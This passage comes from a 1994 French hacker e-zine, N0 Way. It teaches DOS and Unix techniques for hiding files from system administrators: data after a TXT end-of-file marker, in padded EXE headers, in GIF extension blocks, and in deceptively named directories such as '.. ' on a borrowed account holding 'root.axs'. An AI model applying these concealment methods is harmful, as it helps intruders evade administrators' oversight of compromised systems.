CONFIG.OLD (ou .CPS ou .B~K) et la meme chose pour AUTOEXEC font de bon
|
|||
|
depos temporaires. Pour une plus longue echeance essayer TD451.DRV dans
|
|||
|
\WINDOWS\SYSTEM ou un truc du genre.
|
|||
|
|
|||
|
5) Conclusion (de part I)
|
|||
|
|
|||
|
Petite conclusion rapide. Les trois regles d'or pour planquer un file
|
|||
|
sont:
|
|||
|
- Le mettre ou en utilisation normale un user ne le verait meme pas.
|
|||
|
- Que son nom s'integre a son environnement.
|
|||
|
- Choisir un nom/extension que l'user ne penserait pas, en marche normale
|
|||
|
a lire/ouvrir/lancer/etc.
|
|||
|
Et en, heu, regle d'argent:
|
|||
|
- Autant que possible, le crypter.
|
|||
|
|
|||
|
6) PS et PPS
|
|||
|
|
|||
|
PS: Si vous cryptez le file il ne faut PAS que cela soit apparent, par
|
|||
|
exemple PGP met '----- BEGIN PGP MESSAGE -----' (ou un truc du
|
|||
|
genre) au debut de ce qu'il crypte. Si un sys/user voit cela il
|
|||
|
risque fort de le delete immediatement.
|
|||
|
|
|||
|
PPS: Dans la serie Revenge/Annoy si vous voulez simplement irriter le
|
|||
|
sys/user dans ce cas faites tout le contraire de ce que dit ce file. Un
|
|||
|
fichier de 8Mo du nom de SECRET.COD, OCCULT.SEX, VIRUS.XXX dans le ROOT,
|
|||
|
completement crypt<70> (du garbage au hasard) avec en premiere ligne 'JF-DES
|
|||
|
Crypted block. Checksum: 834A4C12' risque grandement d'amuser un sys/user,
|
|||
|
surtout si il en retrouve des variantes subtiles partout sur son disque :-)
|
|||
|
|
|||
|
III) Cacher un file dans un autre
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
Une technique encore plus subtile, et de par la meme meilleure, est de
|
|||
|
cacher un file directement dans un autre. Le file 'host' devrait etre un
|
|||
|
fichier anodin, qui a droit de residence legitime sur le systeme. Cela peut
|
|||
|
permettre de dissimuler encore plus efficacement un file sur un systeme,
|
|||
|
mais egalement (et probablement encore plus important) est que cette
|
|||
|
technique permet de cr<63>er un chemin sur entre 2 personnes a travers une
|
|||
|
zone non-sure du CyberSpace. Exemple: Dans les interets de la securit<69>
|
|||
|
nationale et du peuple, un gouvernement debonnaire a rendu l'echange
|
|||
|
d'informations crypt<70>s ill<6C>gales. Non respet de cette loi vous
|
|||
|
fera deport<72> en Antarctique. Mais, CyberPunk que vous etes, vous
|
|||
|
devez envoyer vos C0deZ a quelqu'un. Vous ecrivez votre message,
|
|||
|
le cryptez. Puis vous digitalisez une photo de votre maison,
|
|||
|
inserez votre file dans la photo (en rempla<6C>ant le gresillement
|
|||
|
(l'aglomeration urbaine derri<72>re chez vous en low-res) du fond par
|
|||
|
votre file crypt<70>), puis vous U/L le tout a votre ami. Ce que je
|
|||
|
viens de decrire est fiction, mais montre un peu les possibilit<69>s
|
|||
|
de cette technique, qui commence d'ailleurs a faire du bruit
|
|||
|
(Remarquez l'allusion).
|
|||
|
[ OUh ouh Arscene, ce n'est plus Fiction !!! Cypherella des cypherpunks l'a
|
|||
|
fait sur Mac deja et j'ai eu des echos comme quoi la meme chose existe sur PC
|
|||
|
et Unix pour int<6E>grer du code PGP a du JPEG et du GIF. ++NeurAlien]
|
|||
|
|
|||
|
1) Un peu de pratique
|
|||
|
|
|||
|
Voici quelque endroits, sur PC, ou un file pourrait etre cach<63>:
|
|||
|
|
|||
|
- Dans un TXT: Un fichier TXT se finit par un CR, LF (qui font aller a la
|
|||
|
ligne) et un marqueur de fin de fichier. En Hex, cela donne 0D 0A 1A.
|
|||
|
Ajoutez ces 3 bytes a la fin d'un fichier TXT, puis ajoutez du text apr<70>s,
|
|||
|
et ni TYPE ni EDIT n'afficheront ce nouveau text. Voici en detail:
|
|||
|
|
|||
|
COPY CON FIRST.TXT
|
|||
|
>Essai de text XXX^Z
|
|||
|
(1 fichier ecrit)
|
|||
|
[Editez ce fichier et remplacez les 3 X respectivement par 0D, 0A et 1A]
|
|||
|
COPY CON TWO.TXT
|
|||
|
>Text secret^Z
|
|||
|
(1 fichier ecrit)
|
|||
|
COPY FIRST.TXT + TWO.TXT /b FINAL.TXT
|
|||
|
TYPE FINAL.TXT
|
|||
|
Essai de text
|
|||
|
|
|||
|
Si vous ouvrez a nouveau FINAL.TXT dans votre editeur Hex vous verrez les
|
|||
|
2 lignes. Cette technique n'est pas terrible en pratique (car un bon
|
|||
|
editeur ASCII ou traitement de texte fera apparaitre tout le texte) mais
|
|||
|
sert bien de demonstration
|
|||
|
|
|||
|
- Dans un EXE: Tout EXE commence par un header d'une longeure variable de
|
|||
|
bytes, et avec l'utilisation rependue de compresseurs d'EXE le seul vrai
|
|||
|
moyen de voir si un header est valide est de lancer l'EXE. Pour inclure ce
|
|||
|
que vous voulez dans le header il suffit d'allonger sa taille. Cette taille
|
|||
|
s'exprime en paragraphes (16 bytes = 1 pararaph), est un WORD et ce trouve
|
|||
|
au 5<>me WORD du fichier (10<31>me et 11<31>me byte). Apr<70>s avoir ajout<75> la
|
|||
|
longeure de votre fichier / 16 ( + un peu pour etre sur ) au header il
|
|||
|
suffit d'inclure votre fichier a la fin de ce header. L'EXE devrait
|
|||
|
toujours fonctionner sans probleme. Si vous compez automatiser l'operation,
|
|||
|
il est bon d'inclure aussi la longeure du fichier en bytes et l'ancienne
|
|||
|
longueure du header.
|
|||
|
|
|||
|
- Dans un GIF: Un GIF est form<72> de plusieures blocs. Un bloc commence par
|
|||
|
soit par un ',', (une virgule quoi), si c'est une image, par ';' si c'est
|
|||
|
la fin du fichier (bon, ok, c'est pas vraiment un bloc), ou par '!' si
|
|||
|
c'est une extension. La, cela devient interressant. Une extension peut
|
|||
|
etre n'importe quoi, un commentaire par exemple, en general un
|
|||
|
viewer de GIF reconnait certaines extension, et ignore tout simplement les
|
|||
|
valeures qu'il ne connait pas. D'ou l'id<69>e de se faire un bloc 'Secret
|
|||
|
info'.
|
|||
|
Bon, comme aucun d'entre vous ne paye sa comm pour D/L N0Way, je peut sans
|
|||
|
crainte vous balancer ces extraits des DOC officielles:
|
|||
|
La premi<6D>re concerne les extensions GIF en general:
|
|||
|
|
|||
|
GIF Extension Blocks are packaged in a manner similar to that used
|
|||
|
by the raster data though not compressed. The basic structure is:
|
|||
|
7 6 5 4 3 2 1 0 Byte #
|
|||
|
+---------------+
|
|||
|
|0 0 1 0 0 0 0 1| 1 '!' - GIF Extension Block Introducer
|
|||
|
+---------------+
|
|||
|
| function code | 2 Extension function code (0 to 255)
|
|||
|
+---------------+ ---+
|
|||
|
| byte count | |
|
|||
|
+---------------+ |
|
|||
|
: : +-- Repeated as many times as necessary
|
|||
|
|func data bytes| |
|
|||
|
: : |
|
|||
|
+---------------+ ---+
|
|||
|
. . . . . .
|
|||
|
+---------------+
|
|||
|
|0 0 0 0 0 0 0 0| zero byte count (terminates block)
|
|||
|
+---------------+
|
|||
|
A GIF Extension Block may immediately preceed any Image Descriptor
|
|||
|
or occur before the GIF Terminator.
|
|||
|
All GIF decoders must be able to recognize the existence of GIF
|
|||
|
Extension Blocks and read past them if unable to process the function
|
|||
|
code.
|
|||
|
|
|||
|
La seconde concerne le bloc d'extension particulier qui nous
|
|||
|
interresse:
|
|||
|
|
|||
|
26. Application Extension.
|
|||
|
|
|||
|
a. Description. The Application Extension contains application-specific
|
|||
|
information; it conforms with the extension block syntax, as described
|
|||
|
below, and its block label is 0xFF.
|
|||
|
|
|||
|
b. Required Version. 89a.
|
|||
|
|
|||
|
c. Syntax.
|
|||
|
|
|||
|
7 6 5 4 3 2 1 0 Field Name Type
|
|||
|
+---------------+
|
|||
|
0 | | Extension Introducer ['!'] Byte
|
|||
|
+---------------+
|
|||
|
1 | | Extension Label [0xFF] Byte
|
|||
|
+---------------+
|
|||
|
+---------------+
|
|||
|
0 | | Block Size [11] Byte
|
|||
|
+---------------+
|
|||
|
1 | |
|
|||
|
+- -+
|
|||
|
2 | |
|
|||
|
+- -+
|
|||
|
3 | | Application Identifier 8 Bytes
|
|||
|
+- -+
|
|||
|
4 | |
|
|||
|
+- -+
|
|||
|
5 | |
|
|||
|
+- -+
|
|||
|
6 | |
|
|||
|
+- -+
|
|||
|
7 | |
|
|||
|
+- -+
|
|||
|
8 | |
|
|||
|
+---------------+
|
|||
|
9 | |
|
|||
|
+- -+
|
|||
|
10 | | Appl. Authentication Code 3 Bytes
|
|||
|
+- -+
|
|||
|
11 | |
|
|||
|
+---------------+
|
|||
|
|
|||
|
+===============+
|
|||
|
| |
|
|||
|
| | Application Data Data Sub-blocks
|
|||
|
| |
|
|||
|
| |
|
|||
|
+===============+
|
|||
|
|
|||
|
+---------------+
|
|||
|
0 | | Block Terminator Byte
|
|||
|
+---------------+
|
|||
|
|
|||
|
i) Extension Introducer - Defines this block as an extension. This
|
|||
|
field contains the fixed value 0x21 ['!' en ASCII].
|
|||
|
|
|||
|
ii) Application Extension Label - Identifies the block as an
|
|||
|
Application Extension. This field contains the fixed value 0xFF.
|
|||
|
|
|||
|
iii) Block Size - Number of bytes in this extension block,
|
|||
|
following the Block Size field, up to but not including the
|
|||
|
beginning of the Application Data. This field contains the fixed
|
|||
|
value 11.
|
|||
|
|
|||
|
iv) Application Identifier - Sequence of eight printable ASCII
|
|||
|
characters used to identify the application owning the Application
|
|||
|
Extension.
|
|||
|
|
|||
|
v) Application Authentication Code - Sequence of three bytes used
|
|||
|
to authenticate the Application Identifier. An Application program
|
|||
|
may use an algorithm to compute a binary code that uniquely
|
|||
|
identifies it as the application owning the Application Extension.
|
|||
|
|
|||
|
|
|||
|
d. Extensions and Scope. This block does not have scope. This block
|
|||
|
cannot be modified by any extension.
|
|||
|
|
|||
|
e. Recommendation. None.
|
|||
|
|
|||
|
Bon, j'espere que tout le monde a compris :-)
|
|||
|
Ce qu'il faut faire devient plus clair:
|
|||
|
Trouvez un endroit ou mettre notre bloc, par exemple la fin du
|
|||
|
fichier ( seek(file, -1, SEEK_END); en C. La fin d'un GIF est
|
|||
|
marqu<71> par un ';' ). Il suffit d'y inserer un '!', le code disant
|
|||
|
que ceci est une Application Extension (0xFF), le numero 11, puis
|
|||
|
votre ID specifique (Sur Compu$serve en forum PICS il y a une liste
|
|||
|
rassemblent tous le Application ID deja utilis<69>s, liste ger<65> par
|
|||
|
Larry Wood). Puis vous mettez votre code de 3 bytes, sorte de
|
|||
|
signature pour verifier que ce n'est pas un faux bloc, puis
|
|||
|
finalement vous balancez votre file, sans trop vous soucier de la
|
|||
|
compression (qui selon la doc doit etre RLE), car de toute fa<66>on il
|
|||
|
sera decod<6F> par un soft maison, et pas par le viewer de GIF.
|
|||
|
Verifiez quand meme qu'aucun byte ne vaut 0, car ce byte marque la
|
|||
|
fin du bloc. Voila, une methode discrete et ais<69>. Merci
|
|||
|
Compu$serve.
|
|||
|
|
|||
|
2) Finalement...
|
|||
|
Au fait, j'ai trait<69> certaines methodes, et j'espere que vous
|
|||
|
pensez deja a d'autres (elles sont illimit<69>s). Mais, je n'ais pas
|
|||
|
parl<72> de celle mentionn<6E> dans l'intro, du Crypted text dans du
|
|||
|
graphic. Ben, heu, a vous de la faire :-) Serieusement j'etudie la
|
|||
|
question, et j'ai vu certains programmes sur BBS qui pretendait
|
|||
|
faire exactement cela. Peut-etre un article ulterieure (enfin,
|
|||
|
j'ai dit peut-etre)...
|
|||
|
|
|||
|
X) Bon, ben la le file est fini. J'espere que vous avez appreci<63>,
|
|||
|
car ce fut interessant a ecrire. En cas ou vous auriez deja
|
|||
|
oubli<6C>, me llamo Arscene, et je prends data/info/mail/insultes/louanges/
|
|||
|
demandes_en_marriage/pots_de_vin/prix_pulitzer/etc en bal Arscene sur
|
|||
|
The 0NE, le RTC EFZ, ou sur A-D. Si besoin, voici ma cl<63>:
|
|||
|
|
|||
|
-----BEGIN PGP PUBLIC KEY BLOCK-----
|
|||
|
Version: 2.3a
|
|||
|
|
|||
|
mQCNAi501fkAAAEEAMJm9gMhAGYaOnjYFzTVWxAX17rDX4tUjRG7wD6u5BgyOWFL
|
|||
|
gtyx3p8NQJCtjZOuRGOvSRFdm0l/fYY3qWbaXFOSRAY516ihc0OZurYaTROoIk3u
|
|||
|
/PuCUC9cHJmnFX6LpHj8MUtEpk1A19dM5UYmKQekDcSavCPv/xRorln5z03NAAUR
|
|||
|
tAdBcnNjZW5l
|
|||
|
=IosC
|
|||
|
-----END PGP PUBLIC KEY BLOCK-----
|
|||
|
Contactez moi en BAL avant de m'envoyer quelque chose de
|
|||
|
confidentiel pour verifier que vous avez bien ma VRAIE cl<63>.
|
|||
|
---------------------------------------------------------------------
|
|||
|
|
|||
|
-%!% N0 Way %!%-
|
|||
|
|
|||
|
Volume I, Num<75>ro 3, Partie 3.7
|
|||
|
|
|||
|
|
|||
|
w____OO____w
|
|||
|
|
|||
|
Playing hide 'n' seek in CyberSpace
|
|||
|
|
|||
|
by ++NeurAlien
|
|||
|
|
|||
|
/\/OO\/\
|
|||
|
|
|||
|
Hey, je recois a l'instant l'article tres kewl d'Arscene et je me dis
|
|||
|
"Helluvabitch... wud B kewl 2 make de zame dingz 4 yunixzz zyztemz !"
|
|||
|
(ce qui veut dire Mr Allg00d :
|
|||
|
"ta mere en Slip bleu devant le Prisu' chausse du 2 !" Ouhahaha )
|
|||
|
|
|||
|
Alors, voila, je vais vous montrer comment jouer au gros chien avec son
|
|||
|
admin de systeme Unix en lui cachant des trucs n'importe ou. Ceci est
|
|||
|
utilisable sans programme sp<73>ciaux ni quoi: vous avez juste a connaitre la
|
|||
|
m<EFBFBD>tthode. Et ensuite je vais vous montrer comment vous amuser enormement avec
|
|||
|
les nerfs des admins de serveurs FTP sur le reseau Internet par le biais des
|
|||
|
Incomings directories.
|
|||
|
|
|||
|
Ce N-Phile est dedicace tout specialement <20> Arscene qui s'applique
|
|||
|
toujours <20> nous fournir des articles qui relevent le niveau de N0 Way...
|
|||
|
(Ca va plaire, la distribution de NW 3 est assur<75>e <20> grande <20>chelle cette fois
|
|||
|
ci ! :))
|
|||
|
Je tiens a remercier aussi les quelques personnes qui m'ont enseign<67>es
|
|||
|
l'art du hacking sous Unix, le Department of Defense aux USA sans lequel je
|
|||
|
n'aurais jamais eu acces a l'Internet (ni vous d'ailleur), les chiens dans la
|
|||
|
rue pour m'avoir souvent permis de me d<>fouler, les "experts en s<>curit<69>" pour
|
|||
|
m'avoir souvent fait rire et enfin la brasserie Valstar SA pour m'avoir souvent
|
|||
|
d<EFBFBD>pann<EFBFBD> ;))
|
|||
|
|
|||
|
Ou est ce que je me planque en local?
|
|||
|
====================================
|
|||
|
Well... Sous Unix c'est pas comme sous DOS, les attributs Caches et
|
|||
|
systemes, hum, yen a pas trop. Par contre unix a un gros avantage:
|
|||
|
il accepte BEAUCOUP BEAUCOUP de caracteres dans ses noms de fichier.
|
|||
|
Par exemple, il accepte les espaces dans ses noms de fichier.
|
|||
|
Ainsi on peut facilement dissimuler cr<63>er des fichier qui seront difficilement
|
|||
|
accessibles.
|
|||
|
|
|||
|
On peut cr<63>er un fichier "sale admin" par exemple mais bon, ca se remarque !
|
|||
|
Exemple 1:
|
|||
|
======> Script started on Thu Sep 15 02:16:15 1994
|
|||
|
DaubeNet-tmp {101} ls -al
|
|||
|
total 2
|
|||
|
drwx------ 2 fred emprunte 512 Sep 15 02:16 .
|
|||
|
drwx------ 11 fred emprunte 512 Sep 15 02:16 ..
|
|||
|
-rw------- 1 fred emprunte 0 Sep 15 02:16 ex1
|
|||
|
DaubeNet-tmp {102} cat >"sale admin"
|
|||
|
Haha, gros nain, tu sais meme pas effacer un fichier pfff....
|
|||
|
^D
|
|||
|
DaubeNet-tmp {103} exit
|
|||
|
======> Script done on Thu Sep 15 02:17:36 1994
|
|||
|
|
|||
|
Alors la, l'admin quand il se pointe il voie:
|
|||
|
======> Script started on Thu Sep 15 02:19:04 1994
|
|||
|
DaubeNet-tmp {101} ls -al
|
|||
|
total 3
|
|||
|
drwx------ 2 fred emprunte 512 Sep 15 02:17 .
|
|||
|
drwx------ 12 fred emprunte 512 Sep 15 02:17 ..
|
|||
|
-rw------- 1 fred emprunte 62 Sep 15 02:17 sale admin
|
|||
|
DaubeNet-tmp {102} exit
|
|||
|
======> Script done on Thu Sep 15 02:19:18 1994
|
|||
|
|
|||
|
Ehehe, voila... Et la l'admin il aura beau tenter:
|
|||
|
======> Script started on Thu Sep 15 02:19:22 1994
|
|||
|
root# ls -al
|
|||
|
total 3
|
|||
|
drwx------ 2 fred emprunte 512 Sep 15 02:17 .
|
|||
|
drwx------ 12 fred emprunte 512 Sep 15 02:17 ..
|
|||
|
-rw------- 1 fred emprunte 62 Sep 15 02:17 sale admin
|
|||
|
root# rm sale admin
|
|||
|
rm: sale: No such file or directory.
|
|||
|
rm: admin: No such file or directory.
|
|||
|
root# echo ARghhhhhh
|
|||
|
ARghhhhhh
|
|||
|
root# exit
|
|||
|
======> Script done on Thu Sep 15 02:19:45 1994
|
|||
|
|
|||
|
Bref, pour l'effacer, en fait tout ce qu'il suffit de faire c'est:
|
|||
|
======> Script started on Thu Sep 15 02:20:57 1994
|
|||
|
DaubeNet-tmp {101} ls -al
|
|||
|
total 3
|
|||
|
drwx------ 2 fred emprunte 512 Sep 15 02:17 .
|
|||
|
drwx------ 12 fred emprunte 512 Sep 15 02:17 ..
|
|||
|
-rw------- 1 fred emprunte 62 Sep 15 02:17 sale admin
|
|||
|
DaubeNet-tmp {102} rm "sale admin"
|
|||
|
DaubeNet-tmp {103} ls -al
|
|||
|
total 2
|
|||
|
drwx------ 2 fred emprunte 512 Sep 15 02:21 .
|
|||
|
drwx------ 12 fred emprunte 512 Sep 15 02:17 ..
|
|||
|
DaubeNet-tmp {104} exit
|
|||
|
======> Script done on Thu Sep 15 02:21:11 1994
|
|||
|
|
|||
|
|
|||
|
Ca c'est marrant pour faire un peu chier l'admin mais quand vous voulez
|
|||
|
reellement planquer des trucs, il faut la jouer plus fine. Si par exemple
|
|||
|
root.axs et milnet.dialup sont tres importants pour vous et que vous empruntez
|
|||
|
le login de quelqu'un, vous pouvez les cacher tres simplement.
|
|||
|
Exemple 2:
|
|||
|
|
|||
|
======> Script started on Thu Sep 15 02:25:11 1994
|
|||
|
|
|||
|
DaubeNet-fred {101} ls -al
|
|||
|
total 46
|
|||
|
drwx------ 12 fred emprunte 512 Sep 15 02:24 .
|
|||
|
drwxrwxr-x 5 root wheel 512 Sep 9 12:03 ..
|
|||
|
-rwx------ 1 fred emprunte 655 Sep 3 1993 .Xmodmaprc
|
|||
|
-rwx------ 1 fred emprunte 8331 Sep 3 1993 .Xresources
|
|||
|
-rwx------ 1 fred emprunte 653 Jul 4 15:21 .cshrc
|
|||
|
drwx------ 2 fred emprunte 512 Jun 12 22:31 .elm
|
|||
|
-rw------- 1 fred emprunte 2229 Jul 4 17:45 .history
|
|||
|
-rwx------ 1 fred emprunte 207 Sep 3 1993 .login
|
|||
|
-rwx------ 1 fred emprunte 105 Sep 3 1993 .mailrc
|
|||
|
-rwx------ 1 fred emprunte 83 Sep 3 1993 .profile
|
|||
|
-rwx------ 1 fred emprunte 7908 Sep 3 1993 .twmrc
|
|||
|
-rwx------ 1 fred emprunte 866 Sep 3 1993 .xinitrc
|
|||
|
drwx------ 2 fred emprunte 512 Jun 12 22:31 Mail
|
|||
|
-rw------- 1 fred emprunte 260 Sep 15 02:24 milnet.dialup
|
|||
|
-rw------- 1 fred emprunte 1040 Sep 15 02:24 root.axs
|
|||
|
drwx------ 7 fred emprunte 512 Jun 20 01:40 src
|
|||
|
drwx------ 2 fred emprunte 512 Sep 15 02:21 tmp
|
|||
|
drwx------ 5 fred emprunte 512 Jul 4 14:45 tools
|
|||
|
[voici nos fichiers]
|
|||
|
DaubeNet-fred {102} ll milnet.dialup root.axs
|
|||
|
1 -rw------- 1 fred emprunte 260 Sep 15 02:24 milnet.dialup
|
|||
|
2 -rw------- 1 fred emprunte 1040 Sep 15 02:24 root.axs
|
|||
|
[On cr<63>e le directory fantome]
|
|||
|
DaubeNet-fred {103} mkdir ".. "
|
|||
|
[On met nos fichiers dedans]
|
|||
|
DaubeNet-fred {104} mv milnet.dialup root.axs ".. "
|
|||
|
[OOOooOOoOoOps, ca fait drole quand meme deux directory ".." !!!]
|
|||
|
DaubeNet-fred {105} ls -al
|
|||
|
total 44
|
|||
|
drwx------ 13 fred emprunte 512 Sep 15 02:25 .
|
|||
|
drwxrwxr-x 5 root wheel 512 Sep 9 12:03 ..
|
|||
|
drwx------ 2 fred emprunte 512 Sep 15 02:25 ..
|
|||
|
-rwx------ 1 fred emprunte 655 Sep 3 1993 .Xmodmaprc
|
|||
|
-rwx------ 1 fred emprunte 8331 Sep 3 1993 .Xresources
|
|||
|
-rwx------ 1 fred emprunte 653 Jul 4 15:21 .cshrc
|
|||
|
drwx------ 2 fred emprunte 512 Jun 12 22:31 .elm
|
|||
|
-rw------- 1 fred emprunte 2229 Jul 4 17:45 .history
|
|||
|
-rwx------ 1 fred emprunte 207 Sep 3 1993 .login
|
|||
|
-rwx------ 1 fred emprunte 105 Sep 3 1993 .mailrc
|
|||
|
-rwx------ 1 fred emprunte 83 Sep 3 1993 .profile
|
|||
|
-rwx------ 1 fred emprunte 7908 Sep 3 1993 .twmrc
|
|||
|
-rwx------ 1 fred emprunte 866 Sep 3 1993 .xinitrc
|
|||
|
drwx------ 2 fred emprunte 512 Jun 12 22:31 Mail
|
|||
|
drwx------ 7 fred emprunte 512 Jun 20 01:40 src
|
|||
|
drwx------ 2 fred emprunte 512 Sep 15 02:21 tmp
|
|||
|
drwx------ 5 fred emprunte 512 Jul 4 14:45 tools
|
|||
|
DaubeNet-fred {106} cd ".. "
|
|||
|
DaubeNet-fred {107} ls -al
|
|||
|
total 5
|
|||
|
drwx------ 2 fred emprunte 512 Sep 15 02:25 .
|
|||
|
drwx------ 13 fred emprunte 512 Sep 15 02:25 ..
|
|||
|
-rw------- 1 fred emprunte 260 Sep 15 02:24 milnet.dialup
|
|||
|
-rw------- 1 fred emprunte 1040 Sep 15 02:24 root.axs
|
|||
|
DaubeNet-fred {108} cd ..
|
|||
|
DaubeNet-fred {109} mv ".. \milnet.dialup" .
|
|||
|
DaubeNet-fred {110} ls -al
|
|||
|
total 45
|
|||
|
drwx------ 13 fred emprunte 512 Sep 15 02:26 .
|
|||
|
drwxrwxr-x 5 root wheel 512 Sep 9 12:03 ..
|
|||
|
drwx------ 2 fred emprunte 512 Sep 15 02:26 ..
|
|||
|
-rwx------ 1 fred emprunte 655 Sep 3 1993 .Xmodmaprc
|
|||
|
-rwx------ 1 fred emprunte 8331 Sep 3 1993 .Xresources
|
|||
|
-rwx------ 1 fred emprunte 653 Jul 4 15:21 .cshrc
|
|||
|
drwx------ 2 fred emprunte 512 Jun 12 22:31 .elm
|
|||
|
-rw------- 1 fred emprunte 2229 Jul 4 17:45 .history
|
|||
|
-rwx------ 1 fred emprunte 207 Sep 3 1993 .login
|
|||
|
-rwx------ 1 fred emprunte 105 Sep 3 1993 .mailrc
|
|||
|
-rwx------ 1 fred emprunte 83 Sep 3 1993 .profile
|
|||
|
-rwx------ 1 fred emprunte 7908 Sep 3 1993 .twmrc
|
|||
|
-rwx------ 1 fred emprunte 866 Sep 3 1993 .xinitrc
|
|||
|
drwx------ 2 fred emprunte 512 Jun 12 22:31 Mail
|
|||
|
-rw------- 1 fred emprunte 260 Sep 15 02:24 milnet.dialup
|
|||
|
drwx------ 7 fred emprunte 512 Jun 20 01:40 src
|
|||
|
drwx------ 2 fred emprunte 512 Sep 15 02:21 tmp
|
|||
|
drwx------ 5 fred emprunte 512 Jul 4 14:45 tools
|
|||
|
DaubeNet-fred {111} mv ".. /milnet.dialup" .
|
|||
|
DaubeNet-fred {112} ls -al
|
|||
|
total 47
|
|||
|
drwx------ 13 fred emprunte 512 Sep 15 02:26 .
|
|||
|
drwxrwxr-x 5 root wheel 512 Sep 9 12:03 ..
|
|||
|
drwx------ 2 fred emprunte 512 Sep 15 02:26 ..
|
|||
|
-rwx------ 1 fred emprunte 655 Sep 3 1993 .Xmodmaprc
|
|||
|
-rwx------ 1 fred emprunte 8331 Sep 3 1993 .Xresources
|
|||
|
-rwx------ 1 fred emprunte 653 Jul 4 15:21 .cshrc
|
|||
|
drwx------ 2 fred emprunte 512 Jun 12 22:31 .elm
|
|||
|
-rw------- 1 fred emprunte 2229 Jul 4 17:45 .history
|
|||
|
-rwx------ 1 fred emprunte 207 Sep 3 1993 .login
|
|||
|
-rwx------ 1 fred emprunte 105 Sep 3 1993 .mailrc
|
|||
|
-rwx------ 1 fred emprunte 83 Sep 3 1993 .profile
|
|||
|
-rwx------ 1 fred emprunte 7908 Sep 3 1993 .twmrc
|
|||
|
-rwx------ 1 fred emprunte 866 Sep 3 1993 .xinitrc
|
|||
|
drwx------ 2 fred emprunte 512 Jun 12 22:31 Mail
|
|||
|
-rw------- 1 fred emprunte 260 Sep 15 02:24 milnet.dialup
|
|||
|
-rw------- 1 fred emprunte 1040 Sep 15 02:24 root.axs
|
|||
|
drwx------ 7 fred emprunte 512 Jun 20 01:40 src
|
|||
|
drwx------ 2 fred emprunte 512 Sep 15 02:21 tmp
|
|||
|
drwx------ 5 fred emprunte 512 Jul 4 14:45 tools
|
|||
|
[Alors pour pas faire trop louche, on va creer un directory pour un utilitaire
|
|||
|
bien obscure et qui semble utile <20> l'admin. Pour le trouver, reflechissez un
|
|||
|
peu et pas la peine de mettre ".Xnewsrc " si votre systeme n'a pas les news ;]
|
|||
|
DaubeNet-fred {113} mkdir ".Xnewsrc "
|
|||
|
DaubeNet-fred {114} mv root.axs milnet.dialup ".Xnewsrc "
|
|||
|
DaubeNet-fred {115} cd ".Xnewsrc "
|
|||
|
DaubeNet-fred {116} ls
|
|||
|
milnet.dialup root.axs
|
|||
|
DaubeNet-fred {117} ll
|
|||
|
total 3
|
|||
|
1 -rw------- 1 fred emprunte 260 Sep 15 02:24 milnet.dialup
|
|||
|
2 -rw------- 1 fred emprunte 1040 Sep 15 02:24 root.axs
|
|||
|
DaubeNet-fred {118} ls -al
|
|||
|
total 5
|
|||
|
drwx------ 2 fred emprunte 512 Sep 15 02:27 .
|
|||
|
drwx------ 14 fred emprunte 512 Sep 15 02:27 ..
|
|||
|
-rw------- 1 fred emprunte 260 Sep 15 02:24 milnet.dialup
|
|||
|
-rw------- 1 fred emprunte 1040 Sep 15 02:24 root.axs
|
|||
|
DaubeNet-fred {119} cd ..
|
|||
|
DaubeNet-fred {120} ll
|
|||
|
total 43
|
|||
|
1 drwx------ 2 fred emprunte 512 Sep 15 02:26 ..
|
|||
|
1 -rwx------ 1 fred emprunte 655 Sep 3 1993 .Xmodmaprc
|
|||
|
1 drwx------ 2 fred emprunte 512 Sep 15 02:27 .Xnewsrc
|
|||
|
9 -rwx------ 1 fred emprunte 8331 Sep 3 1993 .Xresources
|
|||
|
1 -rwx------ 1 fred emprunte 653 Jul 4 15:21 .cshrc
|
|||
|
1 drwx------ 2 fred emprunte 512 Jun 12 22:31 .elm
|
|||
|
3 -rw------- 1 fred emprunte 2229 Jul 4 17:45 .history
|
|||
|
1 -rwx------ 1 fred emprunte 207 Sep 3 1993 .login
|
|||
|
1 -rwx------ 1 fred emprunte 105 Sep 3 1993 .mailrc
|
|||
|
1 -rwx------ 1 fred emprunte 83 Sep 3 1993 .profile
|
|||
|
8 -rwx------ 1 fred emprunte 7908 Sep 3 1993 .twmrc
|
|||
|
1 -rwx------ 1 fred emprunte 866 Sep 3 1993 .xinitrc
|
|||
|
1 drwx------ 2 fred emprunte 512 Jun 12 22:31 Mail
|
|||
|
1 drwx------ 7 fred emprunte 512 Jun 20 01:40 src
|
|||
|
1 drwx------ 2 fred emprunte 512 Sep 15 02:21 tmp
|
|||
|
1 drwx------ 5 fred emprunte 512 Jul 4 14:45 tools
|
|||
|
[ c'est discret et ca apparait pas sans l'option "-a" de "ls"]
|
|||
|
DaubeNet-fred {121} ls -l
|
|||
|
total 12
|
|||
|
drwx------ 2 fred emprunte 512 Jun 12 22:31 Mail
|
|||
|
drwx------ 7 fred emprunte 512 Jun 20 01:40 src
|
|||
|
drwx------ 2 fred emprunte 512 Sep 15 02:21 tmp
|
|||
|
drwx------ 5 fred emprunte 512 Jul 4 14:45 tools
|
|||
|
DaubeNet-fred {122} rm -fr ".Xnewsrc "
|
|||
|
DaubeNet-fred {123} ls -al
|
|||
|
total 44
|
|||
|
drwx------ 13 fred emprunte 512 Sep 15 02:27 .
|
|||
|
drwxrwxr-x 5 root wheel 512 Sep 9 12:03 ..
|
|||
|
drwx------ 2 fred emprunte 512 Sep 15 02:26 ..
|
|||
|
-rwx------ 1 fred emprunte 655 Sep 3 1993 .Xmodmaprc
|
|||
|
-rwx------ 1 fred emprunte 8331 Sep 3 1993 .Xresources
|
|||
|
-rwx------ 1 fred emprunte 653 Jul 4 15:21 .cshrc
|
|||
|
drwx------ 2 fred emprunte 512 Jun 12 22:31 .elm
|
|||
|
-rw------- 1 fred emprunte 2229 Jul 4 17:45 .history
|
|||
|
-rwx------ 1 fred emprunte 207 Sep 3 1993 .login
|
|||
|
-rwx------ 1 fred emprunte 105 Sep 3 1993 .mailrc
|
|||
|
-rwx------ 1 fred emprunte 83 Sep 3 1993 .profile
|
|||
|
-rwx------ 1 fred emprunte 7908 Sep 3 1993 .twmrc
|
|||
|
-rwx------ 1 fred emprunte 866 Sep 3 1993 .xinitrc
|
|||
|
drwx------ 2 fred emprunte 512 Jun 12 22:31 Mail
|
|||
|
drwx------ 7 fred emprunte 512 Jun 20 01:40 src
|
|||
|
drwx------ 2 fred emprunte 512 Sep 15 02:21 tmp
|
|||
|
drwx------ 5 fred emprunte 512 Jul 4 14:45 tools
|
|||
|
DaubeNet-fred {124} exit
|
|||
